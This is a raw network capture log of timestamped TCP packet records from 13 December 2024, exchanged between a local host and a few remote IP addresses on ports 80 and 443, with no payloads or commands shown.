                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.413098097 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.413687944 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.413841963 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.414690018 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.414758921 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.415832043 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.416176081 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.416773081 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.417150021 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.417953968 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.419061899 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.419068098 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.419157028 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.420232058 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.421060085 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.421350002 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.421355963 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.422312021 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.422318935 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.423032045 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.423361063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.423943043 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.424792051 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.424799919 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.424810886 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.425538063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.426558018 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.426563978 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.426649094 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.426685095 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.427525997 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.428316116 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.428344011 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.428369999 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.428392887 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.428544998 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.428550005 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.428580999 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.428741932 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.429476023 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.429529905 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.429604053 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.429728031 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.430471897 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.430478096 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.430638075 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.431488991 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.431495905 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.432439089 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.433425903 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.433432102 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.433444023 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.434448957 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.434748888 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.435401917 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.435633898 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.436410904 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.436417103 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.437406063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.437608004 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.438549042 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.438698053 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.439347029 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.440315008 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.440320015 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.440391064 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.441324949 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.441667080 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.442373991 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.442506075 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.443367004 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.443727016 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.444103956 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.444144011 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.445045948 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.445056915 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.445957899 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.446002007 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.446911097 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.446971893 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.447326899 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.447357893 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.447379112 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.597918987 CET44349849116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.597994089 CET44349849116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.598824978 CET49849443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.599832058 CET49849443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.599853992 CET44349849116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.631026030 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.631135941 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.631139994 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.631289005 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.631436110 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.631520033 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.631531954 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.631611109 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.632251978 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.632417917 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.632553101 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.633224964 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.633318901 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.634160995 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.634279013 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.635189056 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.635288954 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.636151075 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.636233091 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.637176037 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.637212992 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.638092041 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.638246059 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.639066935 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.639121056 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.639122009 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.639197111 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.639259100 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.639292002 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.640194893 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.640314102 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.641149044 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.641323090 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.642210960 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.642438889 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.643434048 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.643440962 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.644133091 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.644139051 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.645010948 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.645190954 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.645992041 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.646125078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.647025108 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.647104979 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.648042917 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.648055077 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.648937941 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.649049044 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.649126053 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.649621010 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.649621010 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.649921894 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.650089979 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.650388002 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.650955915 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.651061058 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.651892900 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.651909113 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.652975082 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.653095007 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.653879881 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.654068947 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.654870987 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.654915094 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.654966116 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.655090094 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.655904055 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.655910015 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.656544924 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.656862020 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.657015085 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.657042980 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.657104969 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.657989025 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.657996893 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.658941031 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.658993959 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.659245014 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.659812927 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.659817934 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.659873009 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.660803080 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.660898924 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.661758900 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.661932945 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.662853003 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.662954092 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.663738012 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.663789034 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.664733887 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.664778948 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.665728092 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.665800095 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.666774035 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.666913033 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.667725086 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.667731047 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.668766975 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.668831110 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.669795036 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.669800997 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.670749903 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.670906067 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.671662092 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.671766996 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.672686100 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.672725916 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.672866106 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.672897100 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.672950029 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.672950029 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.673768044 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.673774958 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.674050093 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.674729109 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.674791098 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.674798965 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.674880028 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.675609112 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.675656080 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.675699949 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.675750971 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.676740885 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.676789999 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.676856995 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.676912069 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.677669048 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.677735090 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.677761078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.677810907 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.678556919 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.678632975 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.678666115 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.678747892 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.679589033 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.679735899 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.680573940 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.680716991 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.681480885 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.681602001 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.682476997 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.683073044 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.765995979 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.766046047 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.766385078 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.766455889 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.766460896 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.767131090 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.767556906 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.767613888 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.767662048 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.767843008 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.775559902 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.782407999 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.823877096 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.824064970 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.824323893 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.824523926 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.825094938 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.825258017 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.826021910 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.826256990 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.827064991 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.827178955 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.827800989 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.827845097 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.828006983 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.828157902 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.828480959 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.828974009 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.829082966 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.829973936 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.830074072 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.830732107 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.830943108 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.831088066 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.832012892 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.832067966 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.833036900 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.833141088 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.833955050 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.834039927 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.834765911 CET4984080192.168.2.4185.215.113.16
